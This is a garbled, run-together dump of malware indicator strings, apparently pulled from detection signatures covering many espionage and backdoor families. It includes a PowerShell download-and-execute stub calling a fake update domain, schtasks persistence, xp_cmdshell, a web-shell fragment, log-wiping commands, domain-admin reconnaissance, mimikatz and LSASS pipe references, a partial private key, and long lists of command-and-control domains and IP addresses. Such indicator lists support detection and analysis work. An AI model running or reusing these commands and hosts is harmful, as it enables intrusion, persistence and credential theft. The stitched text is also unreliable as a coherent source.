DllASPXSpyIIS Spyprotected void DGCoW(object sender,EventArgs e)openmydoorInstall service errorstart remove serviceNdisVersionUnable to alloc the adapter!Wait for master fuckxx.exe <HOST> <PORT>chkroot2007Door is bind on %sMicrosoft.Exchange.Clients.Auth.dllDllshellexc2010Users\\ljw\\Documentsplease input pathauth.owa\\DnsTunClient\\\\t-DNSTunnel\\xssok.blogspotdnstunclientbecause of error, can not analysiscan not deal witn the errorthe other retun one RSTCoversation produce one errorProgram try to use the have deleted the bufferEFH3 [HEX] [SRCFILE] [DSTFILE]123.EXE 123.EFHENCODER: b[i]: = (LUID ERROR)Users\\K8team\\Desktop\\GetPasswordDebug x64\\GetPassword.pdbgetuserinfo usernamejoe@joeware.netIf . specified for userid,Game Over Good Luck By WindReleiceNamejingtisanmenxiachuanxiao.vbsWinds Updategtalklite.comcomputer=%s&lanip=%s&uid=%s&os=%s&data=%sD13idmAdmError: PeekNamedPipe failed with %i.dllUT.exeUT.urlUTlisten SOCKET error.WSAAsyncSelect SOCKET error.new SOCKETINFO error!Http/1.1 403 ForbiddenCreate SOCKET error.This service can't be stoped.Provides support for media palyerCreaetProcess Error%4.2f GBDos Emluator Ver\\PIPE\\FASTDOSFastDos.cppfail,error code = %d.SAFEPROXY HTServerTimer Quit!Useage: %s pid%s PORT[%d] TO PORT[%d] SUCCESS!p0: port for listener\\users\\whg\\desktop\\plug\\[+Y] cwnd : %3d, fligth:\\UnitFrmManagerKeyLog.pas\\UnitFrmManagerRegister.pasInput Name...New Value#TThreadRControl.Execute SEH!!!\\UnitFrmRControl.pasOnSocket(event is error)!Make 3F Version Ok!!!PELEASE DO NOT CHANGE THE DOCAMENTPress [Ok] Continue Run, Press [Cancel] ExitFail To Load LSASRVUser PrincipalRING RAT Exception(can not update server recently)!Sucess!user canceled!Temp Result File , Change it to where you likeBy. 
Twi1ight[both mode] ,delay TIME to read resultsuch as nc.exe or Trojan+++shell mode+++win2008 fso has no privilege to delete filednstunclient -d or -domain <domain>dnstunclient -ip <server ip address>C:\\Windows\\System32\\cmd.exe /C schtasks /create /tn \"\\Microsoft\\Windows\\PLA\\System\\Microsoft Windows\" /tr C:\\Windows\\System32\\cmd.exe /C schtasks /create /tn \"Microsoft Windows\" /tr taskkill /im conime.exe\\dns control\\t-DNSTunnel\\DnsTunClient\\DnsTunClient.cppUDP error:can not bing the port(if there is unclosed the bind process?)use error domain,set domain pls use -d or -domain mark(Current: %s,recv %s)error: packet num error.the connection have condurt,pls try laterCoversation produce one error:%s,coversation failtry to add many same pipe to select group(or mark is too easy).a
get_BadLoginAddressget_LastFailedLoginADS_UF_ENCRYPTED_TEXT_PASSWORD_ALLOWEDget_PasswordExpirationDateBin_ExecSql(\"exec master..xp_cmdshell'bcp \\\"select safile from \" + db + \"..bin_temp\\\" queryout \\\"\" + Bin_TextBox_SavePtc.Text=\"<a href=\\\"javascript:Bin_PostBack('zcg_ClosePM','\"+Bin_ToBase64(de.Key.ToString())+\"')\\\">Close</a>\";Bin_ExecSql(\"IF OBJECT_ID('bin_temp')IS NOT NULL DROP TABLE bin_temp\");-slave <ConnectHost> <ConnectPort> <TransmitHost> <TransmitPort>[+] Make a Connection to %s:%d....cmshared_get_ptr_from_atom_cmshared_get_ptr_from_atom[-] TransmitPort invalid.[+] Waiting for Client on port:%d ......\\setup.exemsi.dll.urlUTmsi.dllUTsetup.exeUT/c del /q %sP
PluginDeflaterCompressionModeSystem.IO.CompressionT
Zcg.Test.AspxSpyPluginsTestPlugin{\rt01{\rtxa3John Doeauthor StoneContent-Disposition: form-data; name=\"m1.jpg\"C
IEComDll.datC
network.proxy.socks_port\", I am AdminI am UserRun install success!Service install success!Something Error!Not Configed, Exiting$login$$sysinfo$$shell$$fileManager$$fileDownload$$fileUpload$*
Error2Can't find [%s]!Check the file name and try again!Open [%s] error! %dThe Size of [%s] is zero!CreateThread DownloadFile[%s] Error!UploadFile [%s] Error:Connect Server Failed!Receive [%s] Error(Recved[%d] != Send[%d])!Receive [%s] ok! Use %2.2f seconds, Average speed %2.2f k/sCreateThread UploadFile[%s] Error!Ready Download [%s] ok!Get ControlInfo from FileClient error!FileClient has a error!VirtualAlloc SendBuff Error(%d)ReadFile [%s] Error(%d)...ReadFile [%s] Data[Readed(%d) != FileSize(%d)] Error...RecvData MyRecv_Info Size Error!RecvData MyRecv_Info Tag Error!SendData szControlInfo_1 Error!SendData szControlInfo_3 Error!VirtualAlloc RecvBuff Error(%d)RecvData Error!WriteFile [%s} Error(%d)...SystemVersion:    %sProduct  ID:      %sInstallPath:      %sInstallTime:      %d-%d-%d, %02d:%02d:%02dResgisterGroup:   %sRegisterUser:     %sComputerName:     %sWindowsDirectory: %sSystem Directory: %sNumber of Processors:       %dCPU[%d]:  %s: %sMHzRAM:         %dMB Total, %dMB Free.DisplayMode: %d x %d, %dHz, %dbitUptime:      %d Days %02u:%02u:%02u\
LoaderDLL.dll{5947BACD-63BF-4e73-95D7-0C8A98AB95F2}\
0SSSSS4412021002050WWWWWvoicemailadobe.exeE
Wscript.Sleep 5000Set FSO = CreateObject(\"Scripting.FileSystemObject\")If(FSO.FileExists(\"then FSO.DeleteFile(\".\\/result?hl=en&id=%s
{mauthor usertitle Vjkygdjdtyujcompany ooocreatim\\yr2012\\mo4\\dy19\\hr15\\min10password 00000000
NSCortr.dllNSCortr1.dllSina.exeWrite file Ok...ERROR: Can not open socket....Error in parametrs:Usage: @<get/put> <IP> <PORT> <file>ERROR: Not connect...Connect successful....clnt <%d> rqstd n ll kllclnt <%d> rqstd swapcld nt sgnl prcs grpcld nt sgnl prntork error/var/tmp/gogomyfilename= |%s|mypid,mygid=mypid=|%d| mygid=|%d|/var/tmp/taskmydevname= |%s|
IVnuk: %dSyn: %d%s
./a filename template_fileMay be %s is empty?template string = |%s|No blocks !!!No data in this block !!!!!!No good lineLog ended at => %sLog started at => %s [pid %d]/var/tmp/taskhostmy hostname: %s/var/tmp/tasklog/var/tmp/.Xtmp01myfilename=-%s-/var/tmp/taskpidmypid=-%d-/var/tmp/taskgidmygid=-%d-G
"*m>9,stack = 0x%x, targ_addr = 0x%xexecl failedHiding complit...nusage: %s <username> <fixthings> [hostname]ls -la %s* ; /bin/cp  ./wtmp.tmp %s; rm  ./wtmp.tmpERROR: Unlinking tmp WTMP file.USAGE: wipe [ u|w|l|a ] ...options...Erase acct entries on tty :   wipe a [username] [tty]Alter lastlog entry       :   wipe l [username] [tty] [time] [host]%%APPDATA%%\\Microsoft\\wuauclt\\wuauclt.datMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)/news/show.asp?id%d=%d0l23kj@nboxu%%s.asp?id=%%d&Sid=%%dUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SP Q%%d)Cookies: UseID=KGIOODAOOK%%s<!--
cWKQmZlaVVVVVVVVVVVVVcwSdcjKz85m7JVm7JFxkZmZmRDcZXAsmZmZzBJ1ys/O
Get-Content $env:Public\\Libraries\\update.vbs) -replacewss.Run \"powershell.exe \" & Chr(34) & \"& {waitfor haha /T 2}\" & Chr(34), 0Call Extract(UpdateVbs, wss.ExpandEnvironmentStrings(\"%PUBLIC%\") & \"\\Libraries\\update.vbs\")CreateObject(\"WScript.Shell\").Run cmd, 0oJGdsb2JhbDpteWhvc3QgPSE9NRT0iJXB1YmxpYyVcTGlicmFyaWVzXU2V0IHdzcyA9IENyZWF0ZU9iamVjdCgid1NjcmlwdC5TaGVJHNjcmlwdGRpciA9IFNwbGl0LVBhdGggLVBhcmVudCAtUGF0aCADQpTZXQgd3NzID0gQ3JlYXRlT2JqZWNd2hvYW1pICYgaG9zdG5hbDownloadExecute=\"powershell \"\"&{$r=Get-Random;$wc=(new-object System.Net.WebClient);$wc.DownloadFile(-ExecutionPolicy Bypass -File \"&HOME&\"dns.ps1\"CreateObject(\"WScript.Shell\").Run Replace(DownloadExecute,\"-_\",\"bat\")CreateObject(\"WScript.Shell\").Run DnsCmd,0http://winodwsupdates.me%userprofile%\\AppData\\Local\\Microsoft\\ $fdn=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('&{$rn = Get-Random; $id = 'TR') -replace '__',('DNS'+$id) | \\upd.vbsschtasks /create /F /sc minute /mo ') -replace '__',('HTP'+$id) | &{$rn = Get-Random -minimum 1 -maximum 10000; $id = 'AZhttp://www.israirairlines.com/?mode=page&page=14635&lang=eng<source code from https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.htmlrrrr\\Libraries\\fireueye.vbs\
wss.Run \"powershell.exe \" & Chr(34) & \"& {(Get-Content $env:Public\\Libraries\\update.vbs) -replace '__',(Get-Random) | Set-Cm
Call Extract(DnsPs1, wss.ExpandEnvironmentStrings(\"%PUBLIC%\") & \"\\Libraries\\dns.ps1\")2
whoami & hostname & ipconfig /allnet user /domain 2>&1 & net group /domain 2>&1net group \"domain admins\" /domain 2>&1 & (Get-Content $env:Public\\Libraries\\dns.ps1) -replace ('#'+'##'),$botid | Set-Content $env:Public\\Libraries\\dns.ps1Invoke-Expression ($global:myhome+'tp\\'+$global:filename+'.bat > '+$global:myhome+'tp\\'+$global:filename+'.txt')('00000000'+(convertTo-Base36(Get-Random -Maximum 46655)))flash.Media.Sound()call Kernel32!VirtualAlloc(0x1f140000hash$=0x10000hash$=0x1000hash$=0x40){4D36E972-E325-11CE-BFC1-08002BE10318}NetStreamzhoupin exploit crewzhopin exploit crewBackDoorLoggerzhuAddresspcap_dump_openResolving IPs to poison...WARNNING: Gateway IP can not be found%s-%02d%02d%02d%02d%02d.rC:\\Users\\%s\\AppData\\Cookies\\N
Net ServiceShellCreator2.Propertiesset_IVSmartCopy2.PropertiesZhuFrameWorkUnable to resolve [ %s ]. ErrorCode %dyour target's IP is : %sRaw TCP Socket Created successfully.N
TinyZBot.Properties.Resources.resourcesAoao WaterMarkRun_a_exenetscp.exeget_MainModule_WebReference_DefaultWSremove_CheckFileMD5Completedhttp://tempuri.org/Zhoupin_CleavergetShadyProcessgetSystemAntivirusesAntiVirusDetectorCOM+ System Extentionscsext.exeCOM_Extentions_binkill command is in last machine, going backmessage data length in B64: %d BytesmimikatzWrapperget_mimikatzLAST_TIME=00/00/0000:00:00PM$if %%ERRORLEVEL%% == 1 GOTO lineN
Content-Disposition: inline; comp=%s; account=%s; product=%d;zhCat -l -h -tp 1234A
zhLookUp.PropertiesMimikatzRunnerzhmimikatzZh0uSh311your target
s IP is : %sMozilla/4.0 ( compatible; MSIE 7.0; AOL 8.0 )Users\\parviz\\documents\\UserName=User-001Web=1Mail=1FTP=0IPAddressLow=78.109.194.1143.03
ShellExecuteW
HttpQueryInfoA
^B*stype=info&data=?mmid=&status=run succeed_KB10B2D1_CIlFD2C
eroqw112sfsdfRtlDecompressBuffers
Shell32.dll
F:\\Excalibur\\Excalibur\\Excalibur\\bin\\oSaberSvc.pdbcmd.exe /c MD h
Internet Connect Failed!WOODTALE TECHNOLOGY INCFlyingbird Technology LimitedNeoact Co., Ltd.AmazGame Age Internet Technology Co., LtdEMG Technology LimitedZemi Interactive Co., Ltd337 Technology LimitedRunewaker Entertainment0ncProxyXllUniscribe.dllWS2_32.dllJDNSAPI.dllx64.datLSpyb2Excalibur\\bin\\Shell.pdbB
2OLE32.DLLl
!This is a Win32 program.QWNjZXB0OnVXNlci1BZ2VudDogTdGFzay5kbnME3luLmNN
ncircTMPg~SHELL#N.adobe.xmNEL32.DLLB
|xtplhdS
www.micro1.zyns.comMozilla/4.0 (compatible; MSIE 8.0; Win32)m
C:\\Users\\cmd\\Desktop\\msacm32\\Release\\msacm32.pdbp
CraatePipea
are you there!@#$%^&*()_+.hotp1
AVCObfuscation
AVCSetiriControl
POLL_RATEOP_TIME(end hour)%d:TCP:*:Enabled%s[PwFF_cfg%d]Fake_GetDlgItemTextW: ***value***=
PasswordChangeNotifyVPLRXZHTUdog2j~lDqpqftk(Wou\"Isztk)StartThreadAtWinLogon<
OUEMM/EMM
++[%s^^unknown^^%s]++vtfs43/emm3
mGetInstanceW
%d) Command:%s
-----	------
jMyFileMappingObject[
Connected [%s:%d]...reuse possible: %c] => %d%%\x0ac:\\winnt\\system32\\cmd.exec:\\windows\\system32\\cmd.exec:\\windows\\command.comcopy \"%s\" \"%s\" /Yhttp://%s/files/\"%s\". %s: \"%s\".0x0666----------------This_is_a_boundary$Server 2012Server 2008Server 2003net.exe group \"Domain Admins\" /domainnet.exe group \"Admins. do Dom(SVRID=%d)(TG=%d)(SVR=%s)net.exe localgroup Administradoresc:\\cmd32dll.exe{\\*\\generator Msftedit 5.41.Attachment 1: Complete Professional BackgroundE-mail:  \\cf1\\ul\\f1Education:\\parK
?AVCinj2008Dlg@@?AVCinj2008App@@mp.dll
Starting
hlpuctf.dll
kl.dll
Starting
iomus.dll
Startingatiml.dll
KickInPointsnm.dll
GetReadyForDeadscrsh.dll
GetReadyForDeadPRU\
^J`JUUNSXK
^JUR]N[J]
^J`JUUNa
ZxWinDeffContexP
A95BL765MNG2GPRSh
hauthuid.dll[roboconid][%s][objectset][%s]r
%s%02d.%02d.%02d_%02d.%02d.%02d.skw%
:\\!PROJECTS!\\Mina\\2015\\\\PZZ\\RMO\\:\\work\\PZZC:\\Users\\mlk\\:\\W o r k S p a c e\\D:\\My\\Projects_All\\2015\\\\TOOLS PZZ\\Bezzahod\\IntelRestoreR
rsfvxd.dattsb386.datfrmmlg.datsmdhost.dllK
app.stream-media.netFile %s does'nt exist or is forbidden to acess!GetProcessAddresss of pHttpQueryInfoA Failed!Connect %s error!Download file %s successfully!index.tmpExecute PE Successfullyaa/22/success.xmlaa/22/index.aspFile %s a Non-Pe FileSendRequset error!filelist[%d]=%shttp://update.konamidata.com/test/zl/sophos/td/result/rz.dat?http://update.konamidata.com/test/zl/sophos/td/index.dat?Internet connect error:%dProxy-Authorization:BasicHttpQueryInfo failed:%dread file error:%ddowndll.dllInvalid urlCreate file failedmyAgent%s%s%d%dAvaliable data:%u bytesThe procedure entry point %s could not be located in the dynamic link library %spsapi.dllWinHttpGetProxyForUrlW
%s\\tmp%d.exeM
InternetQueryOptionAWNetEnumResourceAHttpSendRequestExAPSAPI.DLLM
CreatePipeEnumProcessModules%s%duserid=%dthreadid=%dgroupid=%dssdpsvc.dllFail %s LsaServiceInit%-8d Fs %-12s Bs m
msupdater.exemsupdater32.exem
msupdate.pif_
_msupdate_/
Explorer.exe \"FAVORITES.DATCOMSPECA
VirtualProtectExInvalid parameterwinsta0\\defaultEXPLORER.EXECreateProcessAsUserAHttpEndRequestAGetModuleBaseNameAGetModuleFileNameExAEnumProcessesSPSSSQProxy-Authorization:Basic kPStoreCreateInstanceFeb 04 2015I can not start %sdwConnectPortdwRemoteLanPortstrRemoteLanAddressstrLocalConnectIp\
__msgid=__serial=O
clientpath=serverpath=MZ
!This program cannot be run in DOS mode.a
h.dataLRich6KeServiceDescriptorTableH.dataINIT_snprintf_except_handler3mbstowcswcstombsKeGetCurrentIrqlwcscpyZwCreateFileZwQueryInformationFilewcslenatoi5
PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGU
0RichwService Control Manager_vsnwprintfRoot AgencyRoot Agency0StartServiceCtrlDispatcherA\
Getting PortName/Identifier failed - %xSerialAddDevice - error creating new devobj [%#08lx]External Naming Failed - Status %x------- Same multiport - different interrupts%x occurred prior to the wait - starting the'user registry info - userPortIndex: %dCould not report legacy device - %xentering SerialGetPortInfo'user registry info - userPort: %xIoOpenDeviceRegistryKey failed - %x Kernel debugger is using port at address %XRelease - freeing multi contextSerial driver will not load port'user registry info - userAddressSpace: %dSerialAddDevice: Enumeration request, returning NO_MORE_ENTRIES'user registry info - userIndexed: %d\
IoGetRelatedDeviceObject\\Registry\\Machine\\System\\CurrentControlSet\\ServicesPsGetCurrentProcessId\
KeSetImportanceDpcKeQueryPerformanceCounterKeInitializeEventKeInitializeTimerExExReleaseFastMutexUnsafeExAcquireFastMutexUnsafe
VMEM.sysR
ntkrnlpa.exeIoGetDeviceObjectPointerM
IoWriteErrorLogEntryKeRemoveEntryDeviceQueueSeSinglePrivilegeCheckIoBuildDeviceIoControlRequestKeRemoveDeviceQueueIofCompleteRequestKeInitializeSpinLockMmIsNonPagedSystemAddressValidIoCreateDeviceKefReleaseSpinLockFromDpcLeveld
disp.dll%x:%x:%x:%x:%x:%x:%x:%x%c%d.%d.%d.%d%c%hd %dsharepwreglistlogdumpN
Phys Avail:p
millisecsAuthenticateNetUseIpcFailed to authenticate toFailed to disconnect from%
Not deleting...CopyServiceToRemoteMachineDH Exchange failedConnectToNamedPipes3
StackWalk64PRIVHEAD\\\\.\\PhysicalDrive%dCreateNamedPipeWSetSecurityDescriptorDaclGetOverlappedResultTerminateThread%
EFEB0A9C6ABA4CF5958F41DB6A31929776C643DEDC65CC9B67AB8B0066FF2492\\Device\\NdisRaw_\
DMWndClassX%d{774476DF-C00F-4e3a-BF4A-6D8618CFA532}{820C02A4-578A-4750-A409-62C98F5E9237}
gk%1_slocal t = w.exec2str(\"regedit local r = w.exec2str(\"catap*.txt link*.txt node*.tun VirtualEncryptedNetwork.licencemove O FakeVirtualEncryptedNetwork.dllsinfo | basex b 32url | dext l 30w.exec2str(execStr)netnfo irc | basex b 32urlw.exec(\"wfw status\")exec(\"samdump\")cat VirtualEncryptedNetwork.ini|grepif string.lower(k) == \"securityproviders\" thenexec2str(\"plist b | grep netsvcs\").*account.*|.*acct.*|.*domain.*|.*login.*|.*member.*SAURON_KBLOG_KEY =Resolve hosts that answerPrint only replying IpsDo not display MAC addressesInject using process name or pid. DefaultConvert mode: Read log from file and convert to textMaximum running time in seconds64, 64url, 32, 32url or 16.Force decoding when input is invalid/corruptThis cruftAssemble rows of DNS names back to a single string of dataremoves checks of DNS names and lengths (during split)Randomize data lengths (length/2 to length)n
\\*\\3vpnU
ExampleProject.dll
Hincorrect header checkMSAOSSPC.dllM
$IP_PADDING_DATAPORT_NUMbpython27.dllemail.header(L
Crypto.Cipher.AES(mod is NULL - %sFindNextFile
admin\\Desktop\\Babar64\\Babar64\\obj\\DllWrapperUser-Agent: Mozilla/4.0 (compatible; MSI 6.0;ExecQueryFailled!NBOT_COMMAND_LINE!!!EXTRACT ERROR!!!File Does Not Exists-->[%s]/s /n %s \"%s\"%%WINDIR%%\\%s\\%s/c start /wait (D;OICI;FA;;;AN)(A;OICI;FA;;;BG)(A;OICI;FA;;;SY)(A;OICI;FA;;;LS)SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\%COMMON_APPDATA%CONOUT$DLLPATH:\\PROJECT\\XAPS_XAPS_OBJECTIVE.dll" $variant12 = "startUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0is you live?176.31.112.10error in select, errno %d" $mix3 = "no msgerr %di`m waitOpenSSL 1.0.1e 11 Feb 2013" $mix10 = "Xtunnel.exe\\\\.\\pipe\\ahexecimplevelPROJECT\\XAPS_OBJECTIVE_DLL\\.?AVAgentModuleRemoteKeyLogger@@<font size=4 color=red>process isn't exist</font>.winnt.check-fix.com.update.adobeincorp.com.microsoft.checkwinframe.coma
for %%G in (.pdf, .xls, .xlsx, .doc, .docx) do (cmd /c copyforfilesYour command not writed to pipeTerminal don`t started for executing commandCommand will have end with \\nWantedBy=multi-user.target' >> /usr/lib/systemd/system/Success execute command or long for waiting executing your commandls /etc | egrep -e\"fedora*|debian*|gentoo*|mandriva*|mandrake*|meego*|redhat*|lsb-*|sun-*|SUSE*|release\"rm -f /usr/lib/systemd/system/ExecStart=<table><caption><font size=4 color=red>TABLE EXECUTE FILES</font></caption>RemoteShellbasic_string::_M_replace_dispatchclconfg.dllA
DGMNOEP/%s%s%s/?%s=Control Panel\\Dehttps=https://%snetwork.proxy.ht2http=http://%s:%Control Panel\\Denetwork.proxy.ht&ol1mS9c
%s <proxy ip> <proxy port> <target ip> <target port> <cmd> [arg1 cmd] ... [argX cmd][-] Error in connection() %d - %s[-] Child process exit.POST http://%s:%s/ HTTP/1.1pipe() topipe() fromMIIEpQIBAAKCAQEA4lSvv/W1Mkz38Q3z+EzJBZRANzKrlxeE6/UXWL67YtokF2nNiAeS3CCA4wli6+9CIgX8SAiXd5OezHvI1jza61z/flsqcC1IP//gJVt16nRx3s9z%WINDIR%\\ativpsrz.bin%WINDIR%\\ativpsrn.bink
KERBEROS64.dllkerberos%d.dll\\\\.\\pipe\\lsasspLSASS secure pipeNullSessionPipesstartlogstoplogUnsupported OS (%d)Unsupported OS (%s)zeSecurityDescriptorSpGetInfoSpShutdownu
http://www.jmicron.co.tw0SUCKM3 FROM EXPLORER.EXE MOTH4FUCKA #@!\
http://www.realtek.com0{
\\objfre_w2k_x86\\i386\\guava.pdbM
view MCPVREADVARPERCON as select VARIABLEID,VARIABLETYPEID,FORMATFITTING,SCALEID,VARIABLENAME,ADDRESSPARAMETER,PROTOKOLL,MAXLIMIS
[%d] Offset can not fetched.P
IJKLlGdmaWhram0vn36BgIOChYR3L45xcHNydXQvhmloa2ptbH8voYCDTw==EFGHlGdmaWhrL41sf36BgIOCL6R3dk8=cmd.exe /q /c \"%s\"\\\\.\\pipe\\%s%s%dThis is a service executable! Couldn't start directly.\\\\.\\pipe\\TermHlp_communicatonTermHlp_stdoutTermHlp_stdinsvchostdllserver.dllSvcHostDLL: RegisterServiceCtrlHandler %S failed\\nbtstat.exeDataVersionExLpykh~mzCCRv|mplpykCCHvq{phlCC\\jmmzqkIzmlvpqCCL$,PQR0/0B0H0Q0W0k0QSUVWhHt Hu[1001=cmd.exe1003=ShellExecuteA1002=/c del /q %s1004=SetThreadPriorityssonsvr.exeUTnavlu.dllUT@
VPDN_LU.exeUTpnipcn.dll.urlUTldvpreg.exeUT
set cmd : %s\
NvSmartMax.dll.urlNv.exeCryptProtectMemory failedCryptUnprotectMemory failedr
navlu.dll.urlUTpnipcn.dllUT\\ssonsvr.exe
\"cmd\" /c cd /d \"c:\\Windows\\Temp\\\"&copysvchost.exe a -k -r -s -m5 -v1024000 -padmin-windows2014ren *.rar *.zipc:\\temp\\ipcan.exe<%eval(Request.Item(\"admin-na-google123!@#api.apigmail.combackup.darkhero.orgbel.updatawindows.combinary.update-onlines.orgblackcmd.comcastle.blackcmd.comctcb.blackcmd.comdav.local-test.comtest.local-test.comdev.local-test.comocean.local-test.comga.blackcmd.comhelpdesk.blackcmd.comhelpdesk.csc-na.comhelpdesk.hotmail-onlines.comhelpdesk.lnip.orgjobs.hotmail-onlines.comjustufogame.comlogin.hansoftupdate.comlong.update-onlines.orglonglong.update-onlines.orglongshadow.dyndns.orglongshadow.update-onlines.orglongykcai.update-onlines.orglostself.update-onlines.orgmac.navydocument.commail.csc-na.commantech.updatawindows.commicr0soft.orgmicrosoft-outlook.orgmtc.navydocument.commtc.update-onlines.orgnews.hotmail-onlines.comoac.3322.orgocean.apigmail.compchomeserver.comregistre.organiccrap.comsecurity.pomsys.orgservices.darkhero.orgsgl.updatawindows.comsonoco.blackcmd.comtest.logmastre.comup.gtalklite.comupdate.deepsoftupdate.comupdate.hancominc.comupdate.micr0soft.orgupdate.pchomeserver.comurs.blackcmd.comwang.darkhero.orgwebs.local-test.comword.apigmail.comwordpress.blackcmd.comworking.blackcmd.comworking.darkhero.orgworking.hotmail-onlines.comwww.trendmicro-update.orgwww.update-onlines.orgx.apigmail.comykcailostself.dyndns-free.comykcainobody.dyndns.orgzj.blackcmd.comlaxness-lab.comgoogle-ana1ytics.comwww.google-ana1ytics.comftp.google-ana1ytics.comhotmailcontact.net208.115.242.36208.115.242.37208.115.242.3866.63.178.14272.11.148.22072.11.141.13374.63.195.23674.63.195.23774.63.195.238103.24.0.142103.24.1.54106.187.45.162192.151.236.138192.161.61.19192.161.61.20192.161.61.2267.215.232.17996.44.177.19549.143.192.22167.215.232.18167.215.232.18296.44.182.24396.44.182.24596.44.182.24649.143.205.30working_success@163.comykcaihyl@163.comyuming@yinsibaohu.aliyun.comSVCHostServiceDll.dllm
ModStartModStoptoo long data for this type of transportnot enough server resources to complete operationTask not execute. Arg file failed.Global\\MSCTF.Shared.MUTEX.ZRXpeer has closed the connectiontcpdump.exewindump.exedsniff.exeethereal.exesnoop.exeettercap.exeminiport.datnet_password=%sInternal command not support =((L|-1|AS_CUR_USER:OpenProcessToken():%d, %s|L|-1|CreateProcessAsUser():%d, %s|L|-1|AS_CUR_USER:LogonUser():%d, %s|L|-1|try to run dll %s with user priv|\\\\.\\Global\\PIPE\\sdlrpc\\\\%s\\pipe\\comnodePlugin dll stop failed.AS_USER:LogonUser():%dM
msimghlp.dllximarsh.dllmsximl.dllINTERNAL.dllieuser.exe\\\\.\\pipe\\sdlrpcWaitMutex Abandoned %pOPER|Wrong config: no port|OPER|Wrong config: no lastconnect|OPER|Wrong config: empty address|Trans task %d obj %s ACTIVE fail robj %sOPER|Wrong config: no auth|OPER|Sniffer '%s' running... ooopppsss...|SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\User Agent\\Post PlatformSOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\User Agent\\Pre Platformwww.yahoo.comM
www.bing.com%s: http://%s%s/javascript/view.phpTask %d failed %s,%dMozilla/4.0 (compatible; MSIE %d.0; [CONFIG]name = exe = cmd.exe\\Cobra\\Release\\Cobra.pdb[NAME]object_id=[TIME][CW_LOCAL]system_pipeuser_pipe[TRANSPORT]run_task_system[WORKDATA]address1spstatusadaptablepost_fragpfsgrowperiodMicrosoft-Windows-Security-Auditing4688AppData\\Local\\Temp\\rsys.exe7036RPC Endpoint Locator7045user mode serviceauto startg
POST http://%s:%d/aspxabcdefg.asp?%s HTTP/1.1GET http://%s:%d/aspxabcdef.asp?%s HTTP/1.1s
User-Agent: NetscapeA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-EN; rv:1.7.12) Gecko/20100719 Firefox/1.0.7%
/%d%s%d%
GET %dHTTP/1.1POST http://%ws:%d/%d%s%dHTTP/1.1PeekNamePipeNormal.dotR_eOR_eOR_eO)CiOS_eOD
%s %s %s %s %d %d %d %d %ProgramFiles%\\Internet Explorer\\iexplore.exemsictl.exe127.0.0.1:8080mshtml.datmsisvc-GetModuleFileNameExW:
dwError1 = %d*
GET http://%ws:%d/%d%s%dHTTP/1.1J:\\chong\\S
J:\\chong\\nod\\Release\\SslMM.exen
Host: %ws:%dSCHANNEL.DLL\\Microsoft\\Internet Explorer\\conhost.exe\\Microsoft\\Internet Explorer\\dll2.xor\\Microsoft\\Internet Explorer\\HOOK.DLL\\Microsoft\\Internet Explorer\\main.dll\\Microsoft\\Internet Explorer\\nvsvc.exe\\Microsoft\\Internet Explorer\\SBieDll.dll\\Microsoft\\Internet Explorer\\mon\\Microsoft\\Internet Explorer\\runas.exeSOFTWARE\\360Safe\\LiveupSoftware\\360safeSOFTWARE\\kingsoft\\AntivirusSOFTWARE\\Avira\\Avira DestopSOFTWARE\\rising\\RAVSOFTWARE\\JiangMinSOFTWARE\\Micropoint\\Anti-Attackf
h31415927ttttS
M&GX^DSF&DA@Fsafetyssl.security-centers.comwthkdoc0106test-b7fa835a39/%s?rank=%sModuleStart\x00ModuleStop\x00start1156fd22-3443-4344-c4ffffread\x20file\x2E\x2E\x2E\x20error\x00\x00
4HAL.dll
C:\\proj\\drivers\\fa _ 2009\\objfre\\i386\\atmarpd.pdbd:\\proj\\cn\\fa64\\sengoku_Win32.sys\x00rk_ntsystem.c\\uroboros\\shell.{F21EDC09-85D3-4eb9-915F-1AFA2FF28153}
id-at-postalAddress%
id-ce-keyUsageKey UsageU
id-at-commonName2
RSA-alt%
%sexpires on    : %04d-%02d-%02d %02d:%02d:%02d178.162.197.9\
id-at-serialNumberECDSA with SHA256A
WinRAT-Win32-Release.exeR
sha-1WithRSAEncryptionPostal codeTLS-RSA-WITH-3DES-EDE-CBC-SHAchecking match for '%s' user %s host %s addr %sPEM_read_bio_PrivateKey failedusage: %s [-ehR] [-f log_facility] [-l log_level] [-u umask]%s %s for %s%.100s from %.200s port %d%sclapi32.dllConnection from %s port %d/usr/etc/ssh_known_hostsVersion: %s - %s %s %s %s[-] connect()/bin/sh /usr/etc/sshrckexecdhs.c%s: setrlimit(RLIMIT_FSIZE, { 0, 0 }): %sRunFile: couldn't load SHELL32.DLL!RunFile: couldn't find ShellExecuteExA/W in SHELL32.DLL!E
Invalid input handle!!!P
) -%s-> %s (c
DEBUG: Cannot allocate memory for ptrNextNode->ptrNext!F
DEBUG: Cannot allocate memory for ptrFileArray!%
/c for /L %%i in (1,1,2) DO ping 127.0.0.1 -n 3 & type %%windir%%\\notepad.exe > %s & del /f %s%SYSTEMROOT%\\temp\\_dbg.tmp%SYSTEMROOT%\\SysWOW64\\mspool.dll%SYSTEMROOT%\\System32\\dpcore16t.dll%SYSTEMROOT%\\System32\\wdigestEx.dll%SYSTEMROOT%\\System32\\mspool.dll%SYSTEMROOT%\\System32\\kernel32.dll%SYSTEMROOT%\\SysWOW64\\iastor32.exe%SYSTEMROOT%\\System32\\msvcse.exe%SYSTEMROOT%\\System32\\mshtaex.exe%SYSTEMROOT%\\System32\\iastor32.exe%SYSTEMROOT%\\SysWOW64\\mshtaex.exeInstaller.exeInfo: Process %sError: GetFileTime %s 0x%xInstall succeededError: RegSetValueExA 0x%xhttp://www.java.com/en/download/installed.jsp?detect=jreC
Guangzhou YuanLuo Technology Co.Guangzhou YuanLuo Technology Co.,Ltd$Asahi Kasei Microdevices Corporation0\
Cookie: SN=\
